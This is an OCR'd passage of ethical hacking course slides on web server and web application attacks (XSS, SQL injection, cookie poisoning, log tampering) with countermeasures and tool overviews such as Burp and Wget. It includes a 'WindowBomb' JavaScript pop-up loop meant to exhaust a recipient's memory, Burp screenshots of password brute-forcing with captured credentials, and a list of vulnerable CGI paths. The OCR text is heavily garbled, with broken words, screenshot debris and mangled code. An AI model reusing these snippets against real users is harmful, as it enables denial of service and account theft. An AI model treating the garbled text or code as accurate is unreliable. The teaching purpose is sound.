DoS vulnerabilities, P0P3, SMTP,LDAP,TCP/IP, UDP, 
Registry, Services, users and accounts, password 
vulnerabilities, publishing extensions, MSSQL,IBM 
DB2,0racle,MySQL, PostgressSQL, Interbase, MiniSQL, and 
more. 
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Shadow Security Scanner 



shadow Security Scanner 5.15 - [Scan with Complete Scan policy] 



JflJxJ 



File Base SDK 

SI 



Tools Window Help 




Links 



IP 



Host 



121 127.0.0.1 



anonvmous 















Address 


127.0.0.1 






Host Name 


anonymous 








Average Pinq Response 


0 ms 






Time To Live 


128 


1 




Packet Size 


56 








Start Scan Date 


17.02.200213:09:52 








End Scan Date 


17.02200213:1224 






Whois 


Information 
















IP Seivices 


SNMP Remote Access 






□ 


IP Services 


chargen service 








IP Services 


echo service 






Machine ^^^^^1 






OS Detected 


Microsoft Windows 2000 














Opened Ports : 


20 








Closed Ports : 


1417 








Blocked Ports : 


0 








7 


ECHO -Ectio 








9 


DISCARD - Discard 








13 


DAYTNE - Daytime 






17 


QOTD - Quote of tine Dav 








19 










53 


DDfvlAIN - Domain Name Server 








135 


RPC-LOCATOR - RFC [Remote Procedure Call) Location Service 








445 


f^lCROSOFT-DS -Microsoft-DS 








515 


PRINTER - Printer Spooler 








54G 


AFPOVERTCP- AFP over TCP 








1025 


LISTEN - listen 







H:\ 

0 - System Idle Process 
8 - System 
176 - smss.exe 
204 - csrss.exe 
228 - winlogon.exe 
252 - Winampa.exe 



|~| 5can Complete 



I l^iodules ; 0 |\lext scan host ; 



Vulnerable ; 1225 
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Counter measures 



© IISLockdown: 

• 1 1 SLockdown restricts anonymous access to system 
uti I i ti es as wel I as the abi I ity to write to web content 
directories. 

• It disables Web Distributed Authoring and Versioning 
(WebDAV). 

• It installs the URLScan I SAPI filter. 



©URLScan: 

• UrIScan is a security tool that screens all incoming 
requests to the server by f i Iteri ng the requests based on 

rules that are set by the ad mi nistrator. 
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File System Traversal Countermeasures 



© M icrosoft recommends setti ng the NTFS ACLS on cmd.exe 
and several other powerful executables to Administration 
and SYSTEM: Full Control only. 

© Sample files must be removed. 

© Monitor the audit logs. 

© Apply M icrosoft patches and hotfixes regularly. 
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I ncreasing Web Server Security 



© Use of Firewalls 

© Administrator Account Renaming 

© Disabling the Default Websites 

© Removal of Unused Application 
M appi ngs 

© Disabling Directory Browsing 

© Legal Notices 

© Service Packs, Hotfixes, and 
Templates 

© Checking for Malicious Input in 
Forms and Query Stri ngs 

© Disabling Remote Ad mini strati on 

BC-Council 
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Summary 



© Web servers assume critical i mportance i n the real m of I nternet 
security. 

© Vu I nerabi I i ti es exi st i n d i ff erent rel eases of popu I ar web servers and 
respective vendors patch these often. 

© The inherent security risks owing to compromised web servers have 
impact on the local area networks that host these websites, even on the 
normal users of web browsers. 

© Looking through the long list of vulnerabilities that had been discovered 
and patched over the past few years provi des an attacker ampi e scope to 
plan attacks to unpatched servers. 

© Different tools/ exploit codes aid an attacker in per petrati ng web server 
hacki ng. 

© Countermeasures include scanning for existing vulnerabilities and 
patching them immediately, anonymous access restriction, incoming 
traffic request screening, and filtering. 
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Ethical Hacking 



ModuleXII 

Web Application Vulnerabilities 



Scenario 



George and Brett are friends. Brett is a web 
adnninistrator of his connpany's Website. George is 
aconnputer geel<. Hefindssecurity holes in Brett's 
Website and clainns that he can: 

• Steal identities 

• Hijack accounts 

• M an i pu I ate web pages/ i nj ect mal i ci ous codes i nto the 
client's browser 

• H ave access to conf i den ti al resou rces 

Brett challenges hisclainn nnaintainingthat his 
Website is secure and freefronn any i ntrusion. 

George thinks that it's tinneto prove his nnettle. 

What next? 




Picture Source: 

http://dazOOk.free.fr/ 

geek.gif 
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Modu e Objective 



© Understanding web application setup 
© Objectives of web application hacking 
© Anatomy of an attack 
© Web application threats 
© Countermeasures 
© Tools: 

• Wget 

• BlackWidow 

• Window Bomb 

• Websleutli 

• Burp 
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Modu eF ow 



Web Application Setup 




Counter measures 



Web AppI i cati on H acl<i ng 



Anatomy Of Tine Attacl< 




eo Application 
Hacking Tools 
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Web Application Setup 



© A cl i ent/ server software appi i cati on that 
i nteracts with users or other systems usi ng 
HTTP. 

© Modern applications typically are written in 
J ava (or similar languages) and run on 
distributed application servers, connecting to 
multiple data sources through complex 
business logic tiers. 
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Web Application Setup 




HTTP 
REQUEST 
(CLEAR 
TEXT OR 
SSL) 



WEB CLIENT 



HTTP REPLY 
(J AVA SCR I PT, 
VBSCRI PT, 
HTML, etc.) 



APACHE, IIS, ■ 
^NETSCAPE, etc. ■ 



SOL DATABASE 
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Web Application Hacl<ing 



© Exploitative behaviors 

• Defacing Websites 

• Stealing credit card 
i nf ormati on 

• Exploiting server-side 
scri pti ng 

• Exploiting buffer 
overflows 

• Domai n N ame Server 
(DNS) attacks 

• Employ malicious code 
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Picture Source: 



http://www.governmentsecurity.org/ articles/ images/ SQ 
L_inljpg 
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Anatomy of an Attack 




FORM ATI ONGATHE?Wf^ 




PLANNING THE ATTACK 









^ LAUr 




WCTfl^ ATTACK^ 
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©Cross- site scri pti ng 

©SQL injection 

©Command injection 

©Cool<ie/ session poisoning 

©Parameter/ form tampering 

©Buffer overflow 

© Di rectory traversal / forceful 
browsing 

© Cryptograph i c i ntercepti on 
©Cookie snooping 
©Authentication hijacking 
©Log tampering 
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©Error message 
i ntercepti on attack 

©Obfuscation application 

©Platform exploits 

© DM Z protocol attacks 

©Security management 
exploits 

©Web services attacks 
©Zero day attack 
©Network access attacks 
©TCP fragmentation 
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©Occurs when an attacker 
uses a web appi i cati on to 
send malicious code, 
generally J avaScript 

©Stored attacks are those 
where the i nj ected code i s 
permanently stored on the 
target servers i n a database 

©Reflected attacks are 
those where the i nj ected 
code takes another route to 
the victim, such as in an 
Email message 
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©Disclosure of the user's 
sessi on cooki e, al I owi ng an 
attacker to hijack the user's 
session and take over the 
account 

©Disclosure of end user files, 
installation of Trojan horse 
programs, redirecting the 
user to some other page, and 
modifying presentation of 
content 

©Web servers, application 
servers, and web application 
envi ronments are 
suscepti bl e to cross si te 
scripting 
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An Example of XSS 




Script Host 



<5cript> 

evilscriptO 
<\script> 



H acker's Computer 
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Countermeasures 



© Validation of all headers, cookies, query 
strings, form fields, and hidden fields (i.e., 
all parameters) against a rigorous 
specification 

© A stringent security policy 

© Filtering script output can also defeat XSS 
vulnerabilities by preventi ng them from 
bei ng transmitted to users 
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SQL Injection 



©Uses SQL to di recti y mani pulate 
database data 

©An attacker can use a vulnerable web 
application to bypass normal security 
measures and obtai n di rect access to 
valuable data 

©SQL I niection attacks can often be 
executea from the address bar, from 
within application fields, and through 
queries and searches 

©Counter measure 

• Check user i nput to database queri es 

• Validate and sanitizeevery user variable 
passed to the database 




icture Source: 



http:/ / www. vaemergency. 
com/ emupdatenew/ article 
s/ 0 3j an/ i mages_ 0 3j an/ i n 
jection.jpg 
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©Relays malicious code through a web application to 
another system 

©Attacks i ncl ude cal I s to the operati ng system vi a 
system cal I s, the use of external programs vi a shel I 
commands, as wel I as cal Is to backend databases via 
SQL (i.e., SQL injection) 

©Scripts written in perl, python, and other languages 
can be injected into poor y designed web applications 
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Countermeasures 



© Use language-specific libraries that avoid 
problems due to shell commands 

© Validate the data provided to prevent any 
malicious content 

© Structure requests so that all supplied 
parameters are treated as data, rather than 
potenti ally executabi e content 

© J 2E E envi ronments al low the use of the J ava 
sandbox, which can prevent the execution of 
system commands 
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©Cooki es are used to mai ntai n 
sessi on state i n the otherwi se 
stateless HTTP protocol 

©Poisoning allows an attacker 
to i nj ect mal i ci ous content, 
modify the user's on-l i ne 
experience, and obtain 
unauthorized information 

©A proxy can be used for 
rewriting the sessi on data, 
d i spl ayi ng the cooki e data 
and/ or specifying a new User 
I D or other session identifiers 
i n the cooki e 
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b Filler cookies.. 



rCoofa(29 Us)- 



DdeteaLilomalicallj(12BS): 



Si 



1000stas.[N[1001i(J] 
icom [p_go2id] 
100web,net(wml [abd] 
123coLinl.com (www| [mLtapiJaq] 
ISseconiJs.con [mwUNGUsalD] 
!.con[SITESERVERl 

Iioi:qco71i rA.„:.:uji 



1 



liostme.com (ssl21 |nol_v15_0[(JeilD] 
mcalee.com (yi)[GUID| 
tvgNide.com [SITESERVER] 



Path I Cookie Name 



Cootie Data 



1 



com 
movietone, com 
movietone, com 
liome,com 
moiosoilcom 



zap2it,com 
jahoo,com 
jahoo,com 
itiipuccom 



www,phn„. 



windowsm... 
tvlistings 



'cgi-bin/c„, mot_v15_0ideilD 



adobe.com [AWID] 
aaocast.com (www) [Useil] 
alena. com (data) [AlenaChoice] 
alena.comljetteRon) [NGUseilD] 
alena.comlaid] 

alenaieseach.com (www) [CFID) 
™pacom(www)[ALIENZOOJD] 
xl stacomlsliopping) [] 
stacom(www)[AV UID] 
sta,com[AV.USERi;EY] 
cawest.oom (www)[Ame[icaWe: 
iNteipioblems.com [CFTOKEN) 




Cookie name: 
Bokie data: 



hostme.com/cgi-bin/cal-praducts.com/cgii' 
v15 Oidei 
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Countermeasures 



©Plain text or weakly encrypted password 
should not be stored in a cookie 

© Cookietimeout should be implemented 

© Cookie authentication credentials should 
be associated to an I P address 

© Aval I ability of logout functions should be 
provi ded 
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Parameter/ Form Tamper i ng 



© Takes advantage of the hidden or fixed fields 
that worl< as the only security measure i n some 
applications 

© Modifying this hidden field value will cause the 
web appi ication to change accordi ng to the new 
data i ncorporated 

© Can cause theft of services, escalation of access, 
and session hijacking 

© Counter measure: Field validity checking 
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Buffer Overflow 



©Used to corrupt execution 
stack of a web appi i cati on 

© Buffer overflow flaws in 
custom web applications 
are I ess I i kel y to be detected 

©Almost all known web 
servers, application servers, 
and web application 
envi ronments are 
suscepti bl e to attack (save 
J avaand J 2EE 
envi ronments except for 
overflows in the J VM itself) 
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Picture Source: 

http://www.wsl .ch/ land/ biodiversity/ gendi v/ BAFE 
/ overflow.gif 
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Countermeasures 



© Validate input length in forms 

© Bounds checking should be done and extra 
care should be mai ntai ned when using for 
and whi le loops to copy data 

© StackGuard and StackShield for Linux are 
tools to defend programs and systems 
agai nst stack- smash i ng 
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Di rectory Traversal/ Forceful Brows! ng 



©Attack occurs when the attacker is able to browse 
directories and files outside normal application access 

©Attack exposes the di rectory structure of the 
application, and often the underlying web server and 
operating system 

©Attacker can enumerate contents, access secure or 
restricted pages, and gain confidential information, 
locate source code, etc. 
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Countermeasures 



© Defi ne access rights to protected areas of 
Website 

© Apply checl<s/ hot fixes that prevent the 
exploitation of vulnerability such as Unicode to 
affect di rectory traversal 

© Web servers should be updated with security 
patches i n a ti mely manner 
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Cryptographic I nterception 



©Using cryptography, a confidential 
message can be securely sent 
between two parti es 

© E ncrypted traff i c f I ows through 
network fi rewal Is and I DS systems 
and is not inspected 

© I f an attacker i s abl e to take 
advantage of a secure channel , he 
can exploit it more efficiently than 
an open channel 

©Counter measure 

• U se of Secure Sockets Layer (SSL) 
and advanced private key protection 
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Cookie Snooping 



©I n an attempt to protect cool<ies, site 
devel opers often encode the cooki es 

© E asi I y reversi bl e encod i ng methods 
such as Base64 and ROTB (rotating the 
letters of the a! phabet B characters) give 
many a false sense of security regardi ng 
the use of cookies 

©Cookie snooping techniques can use a 
local proxy to enumerate cookies 

©Countermeasure 

• E ncrypted cooki es shoul d be used 

• Embedded source I P address in the 
cookie 

• Cookie nnechan ism can be fully 
integrated with SSL functionality for 
secured remote web application access 
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Authentication Hijacl<ing 



©Authentication pronnpts a user to 
su ppl y the credenti a! s that a! I ow 
access to the appi i cati on 

©It can beacconnplished through 

• Basi c authenti cati on 

• Strong authenti cati on nnethods 
©Web appi i cati ons authenti cate i n 

varying nnethods 
©Enforcing a consistent authentication 

pol i cy between nnultipleand disparate 

applications can prove to be a real 

challenge 
©A security lapse can lead to theft of 

service, session hijacking, and user 

innpersonation 
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.NET Passport Sign-in 



I 



E-mail Address |name@hotinail. COITl 
Password 



^ Sign me in automatically. 

Sign In | 



^ Do not remember my e-mail address for future 
sign-in. (Select this when using a public computer.) 



Don't haye a .NET Passport? Get one now. 



Member Services Terms of Use Privacy Statement 

Some elements© 1999 - 2004 Miorosoft® Corporation. All 
rights reserved. 
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Countermeasures 



© Use authentication methods that use secure 
channels wherever possible 

© I nstant SSL can be configured easily to encrypt 
all traffic between the client and the application 

©Use cookies i n a secure manner where possi ble 
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Log Tamperi ng 



©Logs are kept to track the usage 
patterns of the appi i cati on 

©LOg tannperi ng al lows an attacker 
to cover the! r tracks or alter web 
transaction records 

©Attacker strives to delete logs, 
nnodify logs, change user 
infornnation, and otherwise destroy 

evidence of any attack 
©Counternneasure 

• Di gitally signed and stannped 
logs 

• Separate I ogs for systenn 
events 

• Transacti on I og for al I 
application events 
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SpirAgcnt AIS 



Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 
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Tue 6/05/01 ( 

Tue 6/05/01 t 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 

Tue 6/05/01 ( 



5:35:34 PM 
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5i06il 1 PM 
5:06:1 1 PM 
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5:05:53 PM 
5:05:47 PM 
5:05:45 PM 
5:05:39 PM 
4:57:07 PM 
4:57:07 PM 
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I 



J' 



Messages Logged: ISS 



Picture Source: 

http:// www.computer-monitori ng.com/ i mages/ spy- 
agent/ aimlogss.gif 
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Error M essage I nterception 



©I nformation in error messages are often rich 
with site- specific information that can be used 
for 

• Determiningthetechnologies used in the 
web applications 

• Determi ne whether the attack attempt 
was successful 

• Receive hi nts for attack methods to try 
next 

©Countermeasure 

• Website cloaking capabilities make 
enterprise web resources invisibleto 
hackers 







1 _v. 
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Attack Obfuscation 



©Attackers often work hard to mask and 
otherwi se hi de thei r attacks to avoi d detecti on 

©M ost connnnon nnethod of attack obfuscation 
involves encoding portions of the attack with 
Unicode, UTF-8, or URL encoding 

©M uiti pie levels of encodi ng can be used to 
further bury the attack 

©Used for theft of service, account hijacking, 
information disclosure. Website defacement, etc. 

©Countermeasure 

- Thorough inspection on all traffic 

- Block or translate Unicode and UTF-8 
encodi ng to detect attacks 
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Platform Exploits 



© Web applications are built upon application platforms, 
such as BE A Weblogic, ColdFusion, I BM WebSphere, 
Microsoft .NET, and Sun J AVA technologies, etc. 

© Vulnerabilities include the misconfiguration of the 
application, bugs, insecure internal routines, hidden 
processes and commands, and third-party 
enhancements 

© Theexploit of application platform vu I nerabi I i ties can 
allow: 

• Access to developer areas 

• The ability to update application and site content 
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© DM Z (Demilitarized Zone) is a semi -trusted networl< zone 
that separates the untrusted I nternet from the company's 
trusted internal network 



© M ost compani es I i mi t the protocol s al I owed to f I ow 
through their DM Z 

© An attacker who is able to compromise a system that 
al lows other DM Z protocols often has access to other 
DM Z and internal systems. This level of access can lead 
to: 

• Compromi se of the web appi i cati on and data 

• Defacennent of Websites 

• Access to internal systems, including databases, backups, and 
source code 
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DMZ 




Fi rewal I : H ardwa re or Soflwa re 



DMZ Nt^l 



a] 




m^^S^ Serv-er 
Fi rewal I : H ardwa re or Softuva re 



LAN 



3 



jno 



5{;rv(;r Workstation Workstation Workstation 
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Countermeasures 



© Deploy a robust security policy 

© Have a sound auditing policy 

© The use of signatures to detect and block well- 
known attacks 

• Si gnatures must be aval I abl e for a! I forms of attack, 
and must be continually updated 
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Security Management Exploits 



© Security management systems are targeted in 
order to turn off security enforcement 

© An exploit of security management can lead to 
the modification of the protection policies 

© Counter measures 

• There should be a single consolidated way to manage 
secu r 1 ty that 1 s sped f 1 c to each appi 1 cat! on 

• U se of f 1 rewal I s 
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Web Servi ces Attacks 



© Web services allows process- to- process 
communication between web applications 

© An attacker can inject a malicious script into a 
web service that wi 1 1 enable disclosure and 
modification of data 

© Counter measures 

• Turn off web services not required for regular 
operations 

• Provision for multiple layers of protection 

• Block all known attack paths without relying on 
signature databases alone 
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Zero Day Attacks 



©Zero-day attacks take pi ace between the ti me a vul nerabi I i ty 
is discovered by a researcher or attacker, and the time that the 
vendor issues a corrective patch 

©M ost zero-day attacks are only aval lable as hand-crafted 
exploit code, but zero-day worms have caused rapid panic 

©Zero-day vul nerabi I i ty i s the I aunchi ng poi nt for further 
exploitation of the web application and environment 

© Cou nter measu res 

• No security solution can clainn that they will totally protect 
agai nst al I zero-day attacks 

• E nforce stri ngent security pol i ci es 

• Deploy a firewall and enable heuristic(heuristics— common- 
sense rules drawn from experience— to solve problems) 
scanning 
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N etwork Access Attacks 



© Al I traff i c to and from a web appi i cati on 
traverses networks 

©These attacks use techniques like 
spoofing, bridging, ACL bypass, and stack 
attacks 

© Sn i ff i ng network traff i c wi II all ow vi ewi ng 
of application commands, authentication 
information, and application data as it 
traverses the network 

© Cou nter measu res 

• Shut down unnecessary services and 
therefore unnecessary I isteni ng ports 

• Define firewall rules to pass only 
legiti nnate traffic 
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TCP Fragmentation 



© Every message that is transferred between computers 
by a data network is brol<en down i nto pacl<ets. 

© Often pacl<ets are I i mited to a pre-determi ned size for 
interoperability with physical networks. 

© An attack di recti y agai nst a web server would specify 
that the "Push" flag is set, which would force every 
packet i nto the web server's memory. I n this way, an 
attack would be delivered piece- by- piece, without the 
abi I i ty to detect the attack. 

© Counter measure 

• Useofpacketfilteringdevicesand firewall rules to thoroughly 
i nspect the nature of traff i c di rected at a web server 
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Scenario 



George found out that the Session I Ds 
in Brett's Website are stored in a 
cool<ie to l<eep tracl< of the user's state. 
I f the users are made to cl i cl< upon a 
I i nl<, then they can be redi rected to a 
different site wherein their credentials 
can easi ly be stolen. George sends a 
URL link with a malicious code to C 
Brett via Email. Brett clicks the page. 

I Can George force Brett to take acti ons 
on his behalf by browser exploitation? 

2. Can he use XSS vulnerable site's large 
user base to chew up a smaller site's 
bandwidth? 

3. What would be the implications of 
George's action? 

4. What countermeasures should Brett 
take i n order to prevent such theft of 
information? 
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George sends URL (with a malicious script) 
link via Email 




Brett 



The web server returns the requested page 
(with em bedded mail clous script) 




Brett 
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Hacking Tools 



© I nstant Source 

© Wget 

© WebSleuth 

© BlackWidow 

© WindowBomb 

© Burp 

©cURL 
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I nstant Source 



© http://www.blazingtool.com 

© This tool allows you to see and edit the HTM L 
source code of the web pages 

© 1 1 can be executed from I nternet Explorer 
wherei n a new tool bar wi ndow displays the 
source code for any sel ected part of the page i n 
the browser wi ndow 
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H acki ng Tool : Wget 



© www.gnu.org/ software/ wget/ wget. html 

© Wget is a command line tool for Windows and Unix that 
will download the contents of a Website 

© 1 1 works non-i nteracti vely, i n the background, after the 
user has logged off 

© Wget works particularly well with slow or unstable 
connecti ons by conti nui ng to retri eve a document unti I 
the document is fully downloaded 

© Both http and ftp retrievals can be time stamped, so 
Wget can see if the remote f i I e has changed si nee the 
last retrieval and automatically retri eve the new version 
if it has 
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Wget 



Active URL 
\ 



V/get frontend 



drag/drop area 



Start time 

/ 



File \ Hem Options Help 



URL 



Status 



Time 



http: Wwww. rob. cybercomm. nl\inden. html i 



Initialized 



5-12499912:30 



Timer: Disabled ' wget -t 0 -nc -r -1 1 -R ^^ip -P c:\temp http: Wwww. rob. ciibercomm. nl\index.html 



\ 

shows if timer is active 



The command that is passed to wget 
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H acki ng Tool : WebSI euth 






























Q 

. ™ Browser 




Source 


I 


Intercept 


1. Sd 


der 1. 


Options 


I 


Notes 





aboutiblank ^ ^ ^ \^ 



Properties 


■J^ Toolbox 


Plugins 


Favorites 





No Links In Document 



WebSI BJth is a tool that combines 
spi der i ng wi th the capabi I i ty of a 
personal proxy such as Achilles. 



Picture Source: 

http:/ / sandsprite.com/ si eutli/ 
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BlackWidow 



© http : / / softbytel abs. com 

© Black widow is a Website 
scanner, a site mapping tool, 
a site ri pper, a site mi rrori ng 
tool, and an offline browser 
program 

© 1 1 can be used to scan a site 
and create a compi ete prof i I e 
of the site's structure, fi les. 
Email addresses, external 
links, and even link errors 
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BlackWidow 



Edil: Settings View List Heip 



^1 


i 




m 


1 

~ 1 







Site URL : http://iuggiiboii.com/ 



Browser 



Structure! 



@Ei!iails 



Ext Links 



Link Errors 



Threads 



Email Address 



Title 



From 



academicwing@iicfai.org 
cpad(?icfai.org 
exams@icfai.org 
haja^iuggvboj.com 

jnfo§icfai.o[a 

ssd@iicfai.org 
webmaster@icfai.org 



http://www.icfai.org/Administration_Support_Distance.asp 
http: / /www. icfai. org/Administration_Support_campus.asp 
http://www.icfai.org/Adnninistration_Support_Distance.asp 
http: / /iuggyboy. com/aboutus.html 

.MS:IlM!f?jS{?}.:3Sl. 

http://www.icfai.org/Administration_Support_Distance.asp 
http//www.icfai.org/ 
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AccessDiver 



© AccessDiver is a software which can detect security failures on 
web pages. 

© It has multiple efficient tools which will verify the robustness of 
your accounts and directories accurately. 

ProxiJ Analyzer Directory failures Exploiter j SOCKS server Analyzer 
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Zone 



B 21 G /cgi/handler 
217 I /cgi/webgais 



B 218 



B 219 



0 220 



/'cgi/websendmail 
_/cgi/webdist.cgi 
/cgi/faxsurvey 



B 221 , /cgi/htmlscript 



0 222 



0 223 



/■cgi/pfdisplay.cgi 
/cgi/perl.exe 
0 224 I /'cgi/wwwboard.pl 



0 225 Jcg\/vwm-sq\ 
0 226 /cgi/aglimpse 



0 227 /cgi/man.sh 



0 228 /cgi/view. sh 



0 229 /cgi/view-source 




Path to access- 

Root f Local 
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Hacking Tool: WindowBomb 



<HTML> 
<HEAD> 

<TTTLE>WARNTNG [] INFECTING VIRUS </TITLE> 
</HEAD> 

<BODY ca load = "WindowBomb 
<SCRIPT LANGUAGES "Java Script"> 
C fUNCTION WINDOW BOMB } 
C var ; counter =0 // dummy counter 
whi le (true) 

C 

window open {"http://www.netscape.com", 
^'CRUSHING" 

+ : counter, width=l, height=l, 
resi zable=90} 
: counter ++ 
1 
} 

C/SCRIPT} 

</eODY> 

<j/HTML> 



An Email sent with this html code attached will create 
pop-up wi ndows unti I the PC's memory gets exhausted. 
J avaScript is vulnerable to simple coding such as this. 
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Burp: Positioning Payloads 



http:// portswigger.net 



burp 



burp belp 



^ target Y positions Y pavloads Y beaders Y timing V results Y grep^ 
attack tVIie | sniper ^ | 



P O ST /c g i- ta i n/re g i ste r. p I H"n"P/1 . 0 
Accept: 

C o nte nt-Typ e : a p p I i c ati o n/x- www-fo rm- uri encoded 

User-Agent: M osi 1 1 a/-* . O fc o m p ati b I e ; MSIE 6.0; Windows KIT 5.o;5 

Host: www.app-target.com 

nam e=$ Jobn'^^^OSmitbg S.s ev=§tiH§ S.a g e=S20-30S e=.o c c u p ati o n=Se 
ducation^ &.e m a i l=$jDbn«@smitb.cDmg £^p a s swo rd=gletmein$ &.]p a s 
swo rd 2=$letmein$ S.R e g i ste r=$FCjegist:er->-Me$ 

I 



I add 

I cleargH 
I auto in 



I 



I refresh | 
I clear | 



G positions 



length: 333 



Burp is a tool for perfornning autonnated attacks against 



web-enabled applications. 
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Burp: Configuring Payloads and 
Content Enumeration 



|®burp 




burp help 





rget ^ positions payloads \ headers \ timing \ results [ grep | 



litems processin 

\ " ' 

total payloads: 0 
total requests: 0 



source 



preset list 



burptime file 
custom iterator 
brute forcer 
character substitution 
case substitution 
illegal Unicode 
character blocks 
numbers 




add 



add from list 



load . 



delete 



clear 



Burp comes preconfigured with attacl< payloads and it can checl< for 
common databases on a Lotus Domino server. 



19 burp 










burp save view tools help 










' results 


\ settlnas I 










request 


pavload 


response 


lenath 


"not authorized" 1 




1 


statrep.nsf 


HTTP/1.1 200 OK 


2133 


□ 






2 


schema. nsf 


HTTP/1.1 404 Not Found 


527 






2 


reports. risf 


HTTP/1.1 200 OK 


2374 




1 


4 


names.nsf 


HTTP/1.1 200 OK 


832 


□ 






5 


log.rsf 


HTTP/1.1 200 OK 


1681 


□ 






6 


events 4. nsf 


HTTP/1.1 200 OK 


2338 


□ 






7 


doladmin.tisf 


HTTP/1.1 200 OK 


2375 








8 


dbdirman.nsf 


HTTP/1.1 404 Not Found 


527 


□ 






9 


certs n/.nsf 


HTTP/1.1 200 OK 


2374 








10 


certlog.nsf 


HTTP/1.1 200 OK 


2374 


B 






11 


admin4.nsf 


HTTP/1.1 200 OK 


1616 


□ 






12 


catalog. rsf 


HTTP/1.1 200 OK 


2123 


□ 






13 


domlog.nsf 


HTTP/1.1 200 OK 


621 


□ 






14 


bookmark.nsf 


HTTP/1.1 200 OK 


525 


□ 






15 


domcfg.nsf 


HTTP/1.1 200 OK 


516 


□ 






ic 














progress: 


100% 1 ^^^^V 
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Burp 



$burp 




burp save view tools help 


f results 


settings | 


request 


payload 


response 


error 


timeout 


iength 


"iogin incorrect' 




r us 1 




III II M .U iUU Ul\ 






J r J J 






7092 


favella 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


E 


7093 


favisms 


HTTP/1.0 200 Oi< 


□ 


□ 


3733 


0 


7094 


favored 


HTTP/1.0 200 Oi< 


□ 


□ 


3733 


0 


7095 


favorer 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


E 


7096 


favours 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


E 


7097 


favuses 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7098 


fawners 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7099 


fawnier 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7100 


fawning 


HTTP/1.0 200 Oi< 


□ 


□ 


3733 


0 


7101 


faienda 


HTTP/1.0 302 Object... 


□ 


□ 


757 


□ 


7102 


fearers 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7103 


fearful 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7104 


fearing 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


7105 


feasing 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 


B 


7106 


feasted 


HTTP/1.0 200 0I< 


□ 


□ 


3733 


0 




progress: 18% | ! 



JaJxi 



burp save view tools help 



results settings 



request 


payioad 


response 


iengtli 


name-'username" va.. 


name="password" va... 


285 


0384 


HTTP/1 .0 200 Ok 


1610 


susanit 


monday44 


286 


0385 


HTTP/1 .0 404 Not found 


195 






287 


0386 


HTTP/1 .0 200 Ok 


1611 


dtliomas 


godfatlier 


288 


0387 


HTTP/1 .0 200 Ok 


1611 


rbentiey 


ciiue[i219 


289 


0388 


HTTP/1 .0 200 Ok 


1612 


nichoiasw/ 


password 


290 


0389 


HTTP/1 .0 200 Ok 


1605 


des 


gateway 


291 


0390 


HTTP/1 .0 404 Not found 


195 






292 


0391 


HTTP/1 .0 404 Not found 


195 






293 


0392 


HTTP/1 .0 200 Ok 


1611 


ricliardx 


rictiardx 


294 


0393 


HTTP/1 .0 404 Not found 


195 






295 


0394 


HTTP/1 .0 404 Not found 


195 






296 


0395 


HTTP/1 .0 404 Not found 


195 






297 


0396 


HTTP/1 .0 200 Ok 


1614 


administrator 


infamy 


298 


0397 


HTTP/1 .0 200 Ok 


1617 


administrator2 


firewali 


299 


0398 


HTTP/1 .0 200 Ok 


1613 


joiinneviile 


teacher 


mn 


n^QQ 


UTTPM n yin/l Mntfnimrl 







progress: 100% [| 



Burp can be used for password guessing as well as data mining. 
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Burp Proxy: I ntercepting HTTP/S 
traff i c 



^ burp proKy vl.O 



f interceiit ['^options \^ history ['^ alerts 

1^ Requestto https://online.lloydstsb.co.uk:443 



forward 



drop 



® text O hex 



GET/customer.ibc HTTP/1 .1 
Host: online.lloydstsb.co.uk 

User-Agent: Mozilla/5.0 (X1 1 ; U; Linux i686; en-US; n/:1 .2.1) Geckor20021 204 
Accept: 

text'xml,application/xn^l,application/xhtn^l+xn^l,text/htn^l;q=0.^,texUplain;q=0.8,video/x-n^ng Jnnage/png Jniage/j 

peg,image/gif;q=0.2,text/css,*/*;q=0.1 

Accept-Language: en-us, en;q=0.50 

Accept-Encoding: gzip, deflate, compress;q=0.9 

Accept-Clnarset: ISO-8859-1 , utf-8;q=0.66, *;q=0.66 

Keep-Alive: 300 

Connection: keep-alive 

Referer: http://www.lloydstsb.co.uk/ 



Burp proxy operates as a man-i n-the-middle between the end browser 
and the target web server, and al lows the attacker to i ntercept, i nspect, 
and nnodify the raw traffic passi ng i n both di recti ons. 
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Burp Proxy: Hex-editing of 
Intercepted Traffic 



$ burp proKy vl.O | 



( intercetit |^ options historv ^ alerts^ 

Request to http://login.passport.net:80 




forward 



drop 



O te>ft ® hey. 





U 


1 


1 


J 


4 


□ 


o 


"7 

I 


□ 


Q 

3 


a 


b 


c 


d 


e 


T 






u 


fin 


4 1 


□ J 




2. U 


Z 1 


^ □ 


RQ 


Rr 


Rf 
u 1 


67 


69 


6e 


2e 


7T 


7'> 


r LJD 1 J U 1 1 U 1 r 1 . o r 


1 




JT 


G Q 
DM 


04 


Ju 






40 


□ 4 


□ 4 


50 


2f 


31 


2e 


J 1 


Uu 


fOir^— O l—IT — TDM -1 

T rlu— z Ml 1 rJ 1 . 1 




J. 


u CI 




Rf 
u 1 


^ -J 


t H- 


■J a 




R(- 


Rf 
u 1 


R7 


69 


6e 


2e 


70 


R1 
u 1 


7T 
I o 


1 — Iric-t" 1 ri n i ri riac- 

nuii. luyiri.^ci^ 




3 


73 


70 


6f 


72 


74 


2e 


6e 


65 


74 


Od 


Oa 


55 


73 


65 


72 


2d 


sport.netUser- 




4 


41 


67 


65 


6e 


74 


3a 


20 


4d 


6f 


7a 


69 


6c 


6c 


61 


2f 


35 


Agent: Mozilla/5 




5 


2e 


30 


20 


28 


53 


31 


31 


3b 


20 


55 


3b 


20 


4c 


69 


6e 


75 


.0 (Xll; U; Linu 




6 


73 


20 


69 


36 


33 


36 


3b 


20 


65 


6e 


2d 

